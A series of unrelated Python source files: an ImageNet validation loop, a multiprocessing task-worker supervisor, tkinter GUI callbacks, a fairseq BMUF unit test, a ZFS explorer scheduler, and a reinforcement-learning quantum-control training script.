loss = F.cross_entropy_with_softmax(logits, label)
acc1, acc5 = F.accuracy(logits, label, (1, 5))
if dist.is_distributed(): # all_reduce_mean
loss = dist.all_reduce_sum(loss, "valid_loss") / dist.get_world_size()
acc1 = dist.all_reduce_sum(acc1, "valid_acc1") / dist.get_world_size()
acc5 = dist.all_reduce_sum(acc5, "valid_acc5") / dist.get_world_size()
return loss, acc1, acc5
logger.info("preparing dataset..")
valid_dataset = data.dataset.ImageNet(args.data, train=False)
valid_sampler = data.SequentialSampler(
valid_dataset, batch_size=100, drop_last=False
)
valid_queue = data.DataLoader(
valid_dataset,
sampler=valid_sampler,
transform=T.Compose(
[
T.Resize(256),
T.CenterCrop(224),
T.Normalize(
mean=[103.530, 116.280, 123.675], std=[57.375, 57.120, 58.395]
), # BGR
T.ToMode("CHW"),
]
),
num_workers=args.workers,
)
_, valid_acc, valid_acc5 = infer(valid_func, valid_queue, args)
logger.info("Valid %.3f / %.3f", valid_acc, valid_acc5)
def infer(model, data_queue, args, epoch=0):
objs = AverageMeter("Loss")
top1 = AverageMeter("Acc@1")
top5 = AverageMeter("Acc@5")
total_time = AverageMeter("Time")
t = time.time()
for step, (image, label) in enumerate(data_queue):
n = image.shape[0]
image = image.astype("float32") # convert np.uint8 to float32
label = label.astype("int32")
loss, acc1, acc5 = model(image, label)
objs.update(loss.numpy()[0], n)
top1.update(100 * acc1.numpy()[0], n)
top5.update(100 * acc5.numpy()[0], n)
total_time.update(time.time() - t)
t = time.time()
if step % args.report_freq == 0 and dist.get_rank() == 0:
logger.info(
"Epoch %d Step %d, %s %s %s %s",
epoch,
step,
objs,
top1,
top5,
total_time,
)
return objs.avg, top1.avg, top5.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=":.3f"):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = "{name} {val" + self.fmt + "} ({avg" + self.fmt + "})"
return fmtstr.format(**self.__dict__)
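# Usage sketch for AverageMeter (values are illustrative):
#   acc = AverageMeter("Acc@1")
#   acc.update(87.5, n=100)  # batch accuracy 87.5% over 100 samples
#   print(acc)               # -> "Acc@1 87.500 (87.500)"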
if __name__ == "__main__":
main()
|
worker.py | import logging
from datetime import timedelta, datetime
from importlib import import_module
from logging import getLogger
from pickle import loads
import os
import signal
from multiprocessing import Process
from time import sleep
import sys
logger = getLogger(__name__)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
logger.addHandler(ch)
def enough_time(start_time, timeout):
return (timeout is None) or (start_time + timedelta(seconds=timeout) > datetime.now())
class WorkerSupervisor(object):
def __init__(self, workers_num, broker_path, application_path, stop_timeout=30):
broker_modulepath, broker_classname = broker_path.rsplit('.', 1)
broker_module = import_module(broker_modulepath)
broker_cls = getattr(broker_module, broker_classname)
self.stop_timeout = stop_timeout
self.broker_cls = broker_cls
self.broker = None
self.application_path = application_path
self.workers_num = workers_num
self.workers_processes = []
def receive_hup_signal(self, signum, stack):
logger.info(u'Worker supervisor received HUP signal')
self.gracefully_stop_workers()
def receive_term_signal(self, signum, stack):
logger.info(u'Worker supervisor received TERM signal')
self.gracefully_stop_workers()
sys.exit(0)
def receive_int_signal(self, signum, stack):
self.gracefully_stop_workers(timeout=self.stop_timeout)
if not self.workers_processes:
sys.exit(0)
self.stop_workers()
sys.exit(1)
def receive_quit_signal(self, signum, stack):
self.stop_workers()
sys.exit(2)
def gracefully_stop_workers(self, timeout=None):
start_time = datetime.now()
for worker, process in self.workers_processes:
process.terminate()
while self.workers_processes and enough_time(start_time, timeout):
self.check_workers()
sleep(0.1)  # avoid a busy-wait while workers shut down
def stop_workers(self):
for worker, process in self.workers_processes:
if process.is_alive():
process.kill()
self.check_workers()
def check_workers(self):
for worker, process in self.workers_processes:
if process.is_alive():
self.broker.check_worker(process.pid)
else:
self.broker.terminate_worker(process.pid)
logger.debug("Worker process terminated: id={}".format(process.pid))
self.workers_processes.remove((worker, process))
def start(self):
signal.signal(signal.SIGHUP, self.receive_hup_signal)
signal.signal(signal.SIGTERM, self.receive_term_signal)
signal.signal(signal.SIGINT, self.receive_int_signal)
signal.signal(signal.SIGQUIT, self.receive_quit_signal)
logger.debug("Worker supervisor started: application={self.application_path} broker_class={self.broker_cls}".format(self=self))
self.broker = self.broker_cls()
while True:
workers_processes_fill = self.workers_num - len(self.workers_processes)
for i in range(workers_processes_fill):
worker = Worker(broker=self.broker, application_path=self.application_path)
process = Process(target=worker.start)
process.start()
logger.debug("Worker process started: id={process.pid}".format(process=process))
self.workers_processes.append((worker, process))
self.check_workers()
sleep(0.5)
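# Illustrative setup of the supervisor (the dotted paths below are hypothetical;
# any importable broker class and task module would do):
#   supervisor = WorkerSupervisor(workers_num=4,
#                                 broker_path='myapp.brokers.RedisBroker',
#                                 application_path='myapp.tasks')
#   supervisor.start()  # blocks; respawns dead workers and handles HUP/TERM/INT/QUIT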
class Worker(object):
def __init__(self, broker, application_path=None):
self.application_path = application_path
self.running = True
self.broker = broker
self.id = None
def run_task(self, task, task_args, task_kwargs):
logger.debug('Worker run task {} {} {}'.format(task, task_args, task_kwargs))
try:
return task(*task_args, **task_kwargs)
except Exception as exception:
return exception
def receive_hup_or_term_signal(self, signum, stack):
logger.info(u'Worker {} received signal: {}'.format(self.id, signum))
self.running = False
def receive_int_or_quit_signal(self, signum, stack):
logger.info(u'Worker {} received signal: {}'.format(self.id, signum))
sys.exit(1)
def start(self):
signal.signal(signal.SIGHUP, self.receive_hup_or_term_signal)
signal.signal(signal.SIGTERM, self.receive_hup_or_term_signal)
signal.signal(signal.SIGINT, self.receive_int_or_quit_signal)
signal.signal(signal.SIGQUIT, self.receive_int_or_quit_signal)
self.id = os.getpid()
logger.debug("Worker started: id={self.id} application={self.application_path} broker_class={self.broker.__class__.__name__}".format(self=self))
import_module(self.application_path)
while self.running:
task_pack = self.broker.pull_task(self.id)
if not task_pack:
sleep(0.1)
continue
task, task_args, task_kwargs = loads(task_pack)
task_result = self.run_task(task, task_args, task_kwargs)
self.broker.finish_task(self.id)
logger.debug('task_result {}'.format(task_result))
|
Callbacks_Refactored.py | '''
Created on Jun 9, 2019
Ch08
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from time import sleep
from threading import Thread
from pytz import all_timezones, timezone
from datetime import datetime
class Callbacks():
def __init__(self, oop):
self.oop = oop
def defaultFileEntries(self):
self.oop.fileEntry.delete(0, tk.END)
self.oop.fileEntry.insert(0, 'Z:\\') # bogus path
self.oop.fileEntry.config(state='readonly')
self.oop.netwEntry.delete(0, tk.END)
self.oop.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.oop.combo.get()
self.oop.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.oop.spin.get()
self.oop.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.oop.chVarUn.get(): self.oop.check3.configure(state='disabled')
else: self.oop.check3.configure(state='normal')
if self.oop.chVarEn.get(): self.oop.check2.configure(state='disabled')
else: self.oop.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.oop.radVar.get()
if radSel == 0: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[0])
elif radSel == 1: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[1])
elif radSel == 2: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[2])
# Exit GUI cleanly
def _quit(self):
self.oop.win.quit()
self.oop.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.oop.scr.insert(tk.INSERT, str(idx) + '\n')
sleep(1)
print('methodInAThread():', self.oop.runT.is_alive())
# Running methods in Threads
def createThread(self, num):
self.oop.runT = Thread(target=self.oop.methodInAThread, args=[num])
self.oop.runT.daemon = True
self.oop.runT.start()
print(self.oop.runT)
print('createThread():', self.oop.runT.is_alive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.oop.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.oop.guiQueue.get()
print(qItem)
self.oop.scr.insert(tk.INSERT, qItem + '\n')
# Button callback
def insertQuote(self):
title = self.oop.bookTitle.get()
page = self.oop.pageNumber.get()
quote = self.oop.quote.get(1.0, tk.END)
print(title)
print(quote)
self.oop.mySQL.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
allBooks = self.oop.mySQL.showBooks()
print(allBooks)
self.oop.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
# TZ Button callback
def allTimeZones(self):
for tz in all_timezones:
self.oop.scr.insert(tk.INSERT, tz + '\n')
# TZ Local Button callback
def localZone(self):
from tzlocal import get_localzone
self.oop.scr.delete('1.0', tk.END)
self.oop.scr.insert(tk.INSERT, get_localzone())
# Format local US time with TimeZone info
def getDateTime(self):
fmtStrZone = "%Y-%m-%d %H:%M:%S %Z%z"
# Get Coordinated Universal Time
utc = datetime.now(timezone('UTC'))
self.oop.log.writeToLog(utc.strftime(fmtStrZone),
self.oop.level.MINIMUM)
# Convert UTC datetime object to Los Angeles TimeZone
la = utc.astimezone(timezone('America/Los_Angeles'))
self.oop.log.writeToLog(la.strftime(fmtStrZone),
self.oop.level.NORMAL)
# Convert UTC datetime object to New York TimeZone
ny = utc.astimezone(timezone('America/New_York'))
self.oop.log.writeToLog(ny.strftime(fmtStrZone),
self.oop.level.DEBUG)
# update GUI label with NY Time and Zone
self.oop.lbl2.set(ny.strftime(fmtStrZone))
|
test_bmuf.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
from multiprocessing import Manager
import random
import unittest
import torch
import torch.nn as nn
from fairseq import distributed_utils, optim
class Model(nn.Module):
def __init__(self, input_size, output_size):
super(Model, self).__init__()
self.fc = nn.Linear(input_size, output_size)
def forward(self, input):
output = self.fc(input)
return output
def setup_model_loss_criterion(args, rank, is_cuda):
"""
Set up the model, criterion and optimizer based on the input args.
"""
args.distributed_rank = rank
distributed_utils.distributed_init(args)
torch.manual_seed(1)
model = Model(args.input_size, args.nb_classes)
loss_fn = nn.CrossEntropyLoss()
if is_cuda:
model = model.cuda()
loss_fn = loss_fn.cuda()
optimizer = optim.sgd.SGD(args, model.parameters())
optimizer = optim.FairseqBMUF(args, optimizer)
return model, loss_fn, optimizer
def train_step(input, target, model, loss_fn, optimizer):
"""Do forward, backward and parameter update."""
model.train()
output = model(input)
loss = loss_fn(output, target)
optimizer.backward(loss)
optimizer.step()
def single_gpu_training(args, rank, iterations, shared_results):
is_cuda = torch.cuda.is_available()
if is_cuda:
torch.cuda.set_device(rank)
model, loss_fn, optimizer = setup_model_loss_criterion(args, rank, is_cuda)
for _ in range(iterations):
input = torch.randn(args.batch_size, args.input_size)  # keep input and target batch dims consistent
target = torch.empty(args.batch_size, dtype=torch.long).random_(args.nb_classes)
if is_cuda:
input = input.cuda()
target = target.cuda()
train_step(input, target, model, loss_fn, optimizer)
results = []
for param in model.parameters():
if len(results) == 0:
results = param.flatten().cpu().data
else:
results = torch.cat((results, param.flatten().cpu().data), 0)
shared_results[rank] = results
def setup_args():
args = argparse.Namespace()
args.global_sync_iter = 20
args.block_momentum = 0.875
args.block_lr = 0.5
args.input_size = 5
args.nb_classes = 2
args.batch_size = 1
args.lr = [1e-3]
args.momentum = 0
args.weight_decay = 0
args.warmup_iterations = 0
args.use_nbm = True
args.average_sync = True
args.global_sync_iter = 1
args.distributed_backend = "gloo"
args.distributed_world_size = 2
port = random.randint(10000, 20000)
args.distributed_init_method = "tcp://localhost:{port}".format(port=port)
args.distributed_init_host = "localhost"
args.distributed_port = port + 1
args.local_world_size = args.distributed_world_size
return args
@unittest.skipIf(torch.cuda.device_count() < 2, "test requires 2 GPUs")
class TestBMUF(unittest.TestCase):
def bmuf_process(self, args, iterations):
processes = []
results = Manager().dict()
ctx = torch.multiprocessing.get_context("spawn")
for rank in range(args.distributed_world_size):
p = ctx.Process(
target=single_gpu_training, args=(args, rank, iterations, results)
)
p.start()
processes.append(p)
for p in processes:
p.join()
# Make sure params in both machines are same
assert len(results) == 2
self.assertAlmostEqual(results[0], results[1])
def test_bmuf_sync(self):
# Train model for 1 iteration and do bmuf sync without doing warmup
args = setup_args()
iterations = 1
self.bmuf_process(args, iterations)
def test_warmup_sync(self):
# Train model for 20 iteration and do warmup sync without doing bmuf sync
args = setup_args()
args.warmup_iterations = 20
iterations = 20
self.bmuf_process(args, iterations)
def test_warmup_sync_bmuf_sync(self):
# Train model for 25 iteration and do warmup sync after 20 iteration
# and bmuf sync after 25 iteration
args = setup_args()
args.warmup_iterations = 20
args.global_sync_iter = 5
iterations = 25
self.bmuf_process(args, iterations)
def assertAlmostEqual(self, t1, t2):
self.assertEqual(t1.size(), t2.size(), "size mismatch")
self.assertLess((t1 - t2).abs().max(), 1e-4)
if __name__ == '__main__':
unittest.main()
|
explorer_scheduler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Aldo Sotolongo
# Contact: aldenso@gmail.com
# Description: Schedule automatic explorer of ZFS Storage Appliance.
from __future__ import print_function
import os
from datetime import datetime
import argparse
import time
import threading
import schedule
import inotify.adapters
import zfssa_explorer
def create_parser():
"""Get Arguments"""
parser = argparse.ArgumentParser(
description="Schedule zfssa explorers")
parser.add_argument("-d", "--directory", type=str,
help="Directory to find Server config files (YAML)",
required=True)
parser.add_argument("-t", "--time", nargs='+',
help="24Hr time where the Job should be launched",
required=True)
return parser
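# Example invocation (directory and times are illustrative):
#   ./explorer_scheduler.py -d /etc/zfssa_configs -t 09:00 21:30
# schedules one explorer run per YAML config file at each of the listed times.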
def get_zfssalist(directory):
"""Return list of yml files in current directory"""
files = [file for file in os.listdir(directory) if file.endswith('yml')]
if not files:
print('No yaml found in {}'.format(directory))
exit(1)
zfssalist = [os.path.join(directory, file) for file in files]
return zfssalist
def launch_explorers(zfssalist):
"""Launch explorers from a zfsssa list"""
for zfssa in zfssalist:
argsforexplorer = Namespace(server=zfssa, progress=True)
print("Explorer for '{}' launched".format(zfssa.split('.')[0]))
zfssa_explorer.main(argsforexplorer)
class Namespace:
"""Class to simulate args parsed"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class ThreadingInotify(object):
""" Threading inotify"""
def __init__(self, directory, interval=1):
self.directory = directory
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
while True:
i = inotify.adapters.Inotify()
i.add_watch(self.directory)
for event in i.event_gen(yield_nones=False):
(_, etype, _, _) = event
if any(e in etype for e in ('IN_DELETE', 'IN_MODIFY', 'IN_MOVED_TO', 'IN_MOVED_FROM', 'IN_CREATE')):
schedule.clear()
print("---- Removed previous schedules ----")
zfssanewlist = get_zfssalist(self.directory)
for stime in args.time:
schedule.every().day.at(stime).do(launch_explorers, zfssanewlist)  # use the refreshed list, not the stale startup list
for zfs in zfssanewlist:
print("++++ Scheduled: {} {} ++++".format(stime, zfs))
time.sleep(self.interval)
if __name__ == "__main__":
print("Started at: {}".format(datetime.now()))
parser = create_parser()
args = parser.parse_args()
zfssalist = get_zfssalist(args.directory)
for schedtime in args.time:
schedule.every().day.at(schedtime).do(launch_explorers, zfssalist)
for zfssa in zfssalist:
print("++++ Scheduled: {} {} ++++".format(schedtime, zfssa))
ThreadingInotify(args.directory)
while True:
schedule.run_pending()
time.sleep(1)
|
main_parallel.py | #!/usr/bin/env python3
import os, sys
os.environ["MKL_NUM_THREADS"] = "1"
import numpy as np
from math import pi, sqrt, exp
from scipy.sparse import csr_matrix as csr
from scipy import linalg
import random
import torch
import time
from termcolor import colored
import copy
if __name__ == '__main__':
from math import *
import torch.multiprocessing as mp
import fnmatch
import argparse
from multiprocessing.sharedctypes import Value, RawValue
#import matplotlib.animation as animation
# the commandline arguments are detailed in "arguments.py" because there are too many
from arguments import args
torch.cuda.set_device(args.gpu_id)
torch.set_num_threads(1) # this is for CPU usage
if args.seed != -1:
random.seed(args.seed); torch.manual_seed(args.seed); np.random.seed(args.seed)
args.omega = 1.
################################### x space (for visualization)
x_max = 14.; x_n = 250
x = np.linspace(-x_max,x_max,x_n, dtype=np.float64)
################################### x space end
################################### wave function and energy
omega = args.omega * pi # this is the energy multiplier for the phonon numbers,
# in units of time^{-1} or \omega_c
gamma = args.gamma * pi
n_max = args.n_max
def probability(state):
return np.real(np.conj(state)*state)
def common_factor_of_1Dharmonics(n):
return 1./np.sqrt(np.float128(repr(2**n))*np.float128(repr(factorial(n)))) * sqrt(sqrt(1./pi)) * np.exp((-x*x/2).astype(np.float128))
def adjust_n_max(new_n_max):
global n_max
n_max = new_n_max
global n_phonon
n_phonon=np.array([i for i in range(n_max+1)],dtype=np.float64)
global sqrt_n
sqrt_n = np.array([sqrt(i) for i in range(1,n_max+1)])
global annihilation, creation
annihilation=csr(np.diag(sqrt_n, k=1))
creation=csr(np.diag(sqrt_n, k=-1))
annihilation.prune(); creation.prune()
global x_hat, p_hat ### we assume \hbar = m * \omega = 1
x_hat = sqrt(1/2)*(creation + annihilation)
p_hat = 1.j*sqrt(1/2)*(creation - annihilation)
x_hat.prune(); p_hat.prune()
global x_hat_2, p_hat_2, xp_px_hat
x_hat_2 = x_hat.dot(x_hat); p_hat_2 = np.real(p_hat.dot(p_hat))
xp_px_hat = x_hat.dot(p_hat)+p_hat.dot(x_hat)
x_hat_2.prune(); p_hat_2.prune(); xp_px_hat.prune()
global harmonic_Hamil
harmonic_Hamil = omega *np.diag(1/2 + n_phonon)
harmonic_Hamil = csr(harmonic_Hamil)
harmonic_Hamil.prune()
if __name__ == '__main__':
print('n_max adjusted to {}'.format(new_n_max))
global eigen_states
eigen_states=[]
for i in range(new_n_max + 1):
eigen_states.append(common_factor_of_1Dharmonics(i)*np.polynomial.hermite.hermval(x.astype(np.float128, order='C'), np.array([0. for j in range(i)]+[1.],dtype=np.float128)))
eigen_states=np.array(eigen_states).transpose().astype(np.float64, order='C')
def normalize(vector):
p=linalg.norm(vector)
return vector / p
def phonon_number(state):
return np.sum(probability(state)*n_phonon)
def x_expct(state):
return np.real(np.conj(state).dot(x_hat.dot(state)))
def p_expct(state):
return np.real(np.conj(state).dot(p_hat.dot(state)))
def expct(state, hermitian_operator):
return np.real(np.conj(state).dot(hermitian_operator.dot(state)))
def spatial_repr(state):
mask = np.abs(state) > 1e-4 # only values that are larger than this threshold are displayed
return eigen_states[:, :state.size][:, mask].dot(state[ mask ])
if __name__ != '__main__':
adjust_n_max(n_max)
################################### wave function and energy end
################################## start learning setting, including some other settings not present in the commandline arguments
half_period_steps = args.time_steps
time_step = 1 / half_period_steps
controls_per_half_period = args.n_con
assert half_period_steps % controls_per_half_period == 0, 'We require time_steps ({}) to be divisible by the number of control steps n_con ({}).'.format(args.time_steps, args.n_con)
control_interval = round(half_period_steps / controls_per_half_period)
num_of_episodes = args.num_of_episodes
reward_multiply = args.reward_scale_up
t_max = 100.
num_of_saves = args.num_of_saves
# data input for the neural network
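# The 'xp' input packs five Gaussian-state statistics of the oscillator:
# [<x>, <p>, Var(x), Var(p), Cov(x,p)] -- hence data_size = 5 below.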
def get_data_xp(state):
x_expc, p_expc = x_expct(state), p_expct(state)
return np.array([x_expc, p_expc, expct(state, x_hat_2)-x_expc**2, expct(state, p_hat_2)-p_expc**2, expct(state, xp_px_hat)/2-x_expc*p_expc]).astype(np.float32)
def get_data_wavefunction(state):
# the last five values at the highest levels are supposed negligible and we do not include them as input data for AI
return np.hstack((np.real(state[:-10]),np.imag(state[:-10]))).astype(np.float32)
if args.input == 'xp':
data_size = 5
get_data = get_data_xp # get_data is the function that returns the input data for AI given a quantum state
elif args.input == 'wavefunction':
data_size = 2*(n_max+1-10)
get_data = get_data_wavefunction
elif args.input == 'measurements':
n_periods_to_read = 1.5
num_of_data_per_time_unit = 360*4
assert half_period_steps % num_of_data_per_time_unit == 0, 'We require time_steps ({}) to be divisible by 1440, the number of collected measurement outcomes per unit time.'.format(args.time_steps)
coarse_grain = half_period_steps//num_of_data_per_time_unit
read_length = round(n_periods_to_read * 2 * num_of_data_per_time_unit)  # 1.5 periods * 2 half-periods * 1440 = 4320
read_control_step_length = control_interval//coarse_grain
data_size = 2 * read_length
shape_measurement_data = (2, read_length)
# we do not plot when we do parallelized computation
#import plot
#plot.set_parameters(x=x, x_max=x_max, dt=time_step, num_of_episodes=num_of_episodes, probability=probability,
# reward_multiply=reward_multiply, read_length=read_length, controls_per_half_period=controls_per_half_period)
# set the reinforcement learning settings
if __name__ == '__main__':
import RL
RL.set_parameters(control_interval=control_interval, t_max=t_max, F_max=args.F_max)
if args.input == 'measurements': RL.set_parameters(read_step_length=read_control_step_length)
################################## end learning setting
# Below is the worker function for subprocesses, which carries out the control simulations and pushes the experiences and records to queues that are collected and handled by other processes. (Quantum simulation is implemented in a compiled C module)
# Because too many processes using CUDA will occupy a huge amount of GPU memory, we avoid using CUDA in these workers. Instead, these workers ask a manager process when they want to evaluate the neural network, and only the manager process is allowed to use CUDA to evaluate the neural network for the controls.
def Control(net, pipes, shared_buffer, seed, idx):
simulation = __import__('simulation')
# seeding
random.seed(seed)
np.random.seed(seed)
simulation.set_seed(seed)
# preparing pipes
MemoryQueue, ResultsQueue, ActionPipe, EndEvent, PauseEvent = pipes
state_data_to_manager = np.frombuffer(shared_buffer,dtype='float32')
if args.input=='measurements': state_data_to_manager = state_data_to_manager.reshape(shape_measurement_data)
# random action decision hyperparameters
EPS_START = 0.05
EPS_END = 0.0002
EPS_DECAY = args.n_con*t_max*60
# initialization
steps_done = 0
no_action_choice = net.num_of_control_resolution_oneside
def call_force(data):
nonlocal steps_done
# if LQG control is used, immediately return the LQG control without evaluating the neural network.
if args.LQG:
x=data[0]; p=data[1]
rnd = False
dt = 1./controls_per_half_period
force_max = net.convert_to_force(2*no_action_choice)
F = - ((x+p)+(p-x)*omega*dt)/dt
force = F / omega
force = min(force, force_max)
force = max(force, -force_max)
force = round(force/(force_max/no_action_choice))
force = float(force*(force_max/no_action_choice))
return force, round(force/(force_max/no_action_choice))+no_action_choice, False
# apply an \epsilon-greedy strategy:
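# eps_threshold decays exponentially from EPS_START towards EPS_END with a time
# constant of EPS_DECAY steps; after EPS_DECAY total steps the random-action
# probability is EPS_END + (EPS_START - EPS_END)/e.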
eps_threshold = (EPS_START-EPS_END) * exp(-1. * steps_done / EPS_DECAY)
eps_threshold += EPS_END
steps_done += args.num_of_actors # this approximates the total steps_done of all the actors
if random.random() < eps_threshold and not args.test:
last_action=random.randrange(no_action_choice*2+1)
rnd = True
else:
# copy the input data into the shared buffer read by the manager
state_data_to_manager[:]=data
while ActionPipe.poll(): ActionPipe.recv() # ensure that no data remain in the recv pipe
ActionPipe.send(idx)
last_action = ActionPipe.recv()
rnd = False
force = net.convert_to_force(last_action)
return force, last_action, rnd
# do one episode
def do_episode():
t = 0.
to_stop = False
# prepare the quantum state
state = np.zeros((n_max+1,), dtype=np.complex128)
state[0]=1.
# force is the parameter before -\omega\hat{x}, which is the physical force divided by an omega factor
force = 0.
last_action = no_action_choice
# start the simulation loop
i = 0
experience = []
accu_energy = 0.; accu_counter = 0
if args.input!='measurements':
last_data = get_data(state)*args.input_scaling
while not t >= t_max:
if i % control_interval == 0 and i != 0:
phonon = phonon_number(state)
if not to_stop and phonon <= args.phonon_cutoff:
data = get_data(state)*args.input_scaling
if args.train and i!=control_interval:
experience.append(np.hstack(( last_data, data,
np.array([last_action],dtype=np.float32),
np.array([-(phonon)*reward_multiply],dtype=np.float32) )) )
else: break
if t>30:
accu_energy += phonon_number(state); accu_counter += 1
if (not args.LQG) or args.input=='xp':
force, last_action, rnd = call_force(data)
else: force, last_action, rnd = call_force(get_data_xp(state))
last_data = data
q, x_mean, Fail = simulation.step(state, time_step, force, gamma)
i += 1
# to_stop triggers the stop when it next attempts to store experience
if Fail and not to_stop : to_stop = True
t += time_step
# the organization of measurement data needs to be different:
else:
measurements_cache = []; measurements_input = list(np.zeros(read_length))
forces_along_measurements_input = list(np.zeros(read_length)); forces_to_store = list(np.zeros(read_length//read_control_step_length))
while not t >= t_max-0.01*time_step:
if i % control_interval == 0 and i != 0:
phonon = phonon_number(state)
if not to_stop and phonon <= args.phonon_cutoff:
forces_to_store.append(force*args.input_scaling)
# store the experience as a continuous measurement sequence connecting two neighbouring control steps
if args.train and i!=control_interval:
experience.append(np.hstack(( np.array(measurements_input, dtype=np.float32)[::-1],
np.array(forces_to_store, dtype=np.float32)[::-1],
np.array([last_action], dtype=np.float32),
np.array([-(phonon)*reward_multiply],dtype=np.float32) )) )
else: break
if t>30-0.01*time_step:
accu_energy += phonon_number(state); accu_counter += 1
# organise the lists to discard measurement data that belong to the most distant control step in the past
measurements_input, forces_along_measurements_input = measurements_input[read_control_step_length:], forces_along_measurements_input[read_control_step_length:]
forces_to_store = forces_to_store[1:]
# use the organised measurement data to compute the next control
if (not args.LQG):
force, last_action, rnd = call_force([measurements_input[::-1], forces_along_measurements_input[::-1]])
else: force, last_action, rnd = call_force(get_data_xp(state))
q, x_mean, Fail=simulation.step(state, time_step, force, gamma)
measurements_cache.append(q)
if len(measurements_cache)==coarse_grain:
measurements_input.append(sum(measurements_cache)/coarse_grain*args.input_scaling)
measurements_cache.clear()
forces_along_measurements_input.append(force*args.input_scaling)
i += 1
# to_stop triggers the stop when it next stores experience
if Fail and not to_stop : to_stop = True
t += time_step
# push experience into the main process and push results to the manager
if t>= t_max-0.01*time_step: t=t_max
avg_phonon = accu_energy/accu_counter if t==t_max else args.phonon_cutoff
if not EndEvent.is_set():
MemoryQueue.put( (experience, t, avg_phonon) )
ResultsQueue.put((t, avg_phonon))
return avg_phonon
while True:
# whether to end the program
if EndEvent.is_set():
break
do_episode()
while PauseEvent.is_set():
time.sleep(1.)
# to avoid an endless loop
if EndEvent.is_set():
break
while ActionPipe.poll(): ActionPipe.recv() # ensure that no data remain in the recv pipe
ActionPipe.send(None) # tell the manager that the worker has ended
return
# the manager process for workers. It is used to organise all neural network evaluations into one single process in order to save GPU memory.
# It also monitors the current performance and saves the models.
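# Protocol sketch: a worker writes its network input into its shared RawArray and
# sends its index through its pipe; the manager batches all pending inputs, runs a
# single CUDA forward pass, and replies to each worker with its argmax action.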
def worker_manager(net, pipes, num_of_processes, seed, others):
# initialize
MemoryQueue, ActorPipe, EndEvent, PauseEvent = pipes
random.seed(seed)
torch.manual_seed(seed)
torch.set_grad_enabled(False)
# prepare the path
if not os.path.isdir(args.folder_name): os.makedirs(args.folder_name, exist_ok=True)
if args.write_training_data and args.train:
if os.path.isfile(args.folder_name + '.txt'): os.remove(args.folder_name + '.txt')
# prepare workers
import multiprocessing as mp
from multiprocessing.sharedctypes import RawArray
fork = mp.get_context('forkserver')
results_queue = fork.Manager().Queue()
processes = []
message_conn = []; message_worker_conn = []
worker_data = []
for n in range(num_of_processes):
conn1, conn2 = fork.Pipe(True)
message_conn.append(conn1); message_worker_conn.append(conn2)
shared_buffer = RawArray('f', data_size)
np_memory = np.frombuffer(shared_buffer,dtype='float32')
if args.input=='measurements':
np_memory=np_memory.reshape(shape_measurement_data)
worker_data.append(torch.from_numpy(np_memory))
seed = random.randrange(0,99999)
processes.append( fork.Process( target=Control, args=(copy.deepcopy(net).cpu(), (MemoryQueue, results_queue, conn2, EndEvent, PauseEvent), shared_buffer, seed, n) ) )
net=net.cuda()
net.eval()
# prepare to save
good_actors=[(args.phonon_cutoff,0.) for i in range(num_of_saves)]
simulated_oscillations = 0.
performances = []
episode_passed = 0
# when receiving a net, check whether the previous net should be stored
def receive_net():
if args.test or args.LQG:
if not results_queue.empty():
while not results_queue.empty():
result = results_queue.get()
performances.append(result[1])
with open(os.path.join(args.folder_name, others+'_record.txt'),'a') as f:
f.write('{}\n'.format(result[1]))
return
if ActorPipe.poll():
nonlocal net
if not results_queue.empty():
nonlocal episode_passed, simulated_oscillations
while not results_queue.empty():
result = results_queue.get()
simulated_oscillations += result[0]/2.
performances.append(result[1]) # get the avg_phonon in the result tuple
episode_passed += 1
if args.write_training_data:
with open(args.folder_name + '.txt','a') as f:
f.write('{}, {}\n'.format(simulated_oscillations, result[1]))
# only after 50 additional episodes have passed do we consider saving the next model
if episode_passed > 50 and len(performances) >= 9:
new_avg_phonon = np.mean(np.array(performances[-10:]))
if new_avg_phonon < good_actors[-1][0]:
good_actors[-1] = (new_avg_phonon, copy.deepcopy(net).cpu())
good_actors.sort(key=lambda p: p[0], reverse=False) # sort in increasing order (reverse=False is the default; kept for clarity)
print(colored('new avg phonon record: {:.5f}'.format(new_avg_phonon), 'green',attrs=['bold']))
for idx, actor in enumerate(good_actors):
if type(actor[1]) != float:
torch.save(actor[1].state_dict(), os.path.join(args.folder_name,'{}.pth'.format(idx+1)))
existing_record_name = os.path.join(args.folder_name,'{}_record.txt'.format(idx+1))
if os.path.isfile(existing_record_name): os.remove(existing_record_name)
episode_passed = 0
performances.clear()
net.load_state_dict(ActorPipe.recv())
while ActorPipe.poll():
net.load_state_dict(ActorPipe.recv())
net = net.cuda()
net.eval()
if args.show_actor_recv: print(colored('new model received', 'yellow'))
if args.input != 'measurements':
network_input = torch.empty((num_of_processes,data_size), device='cuda')
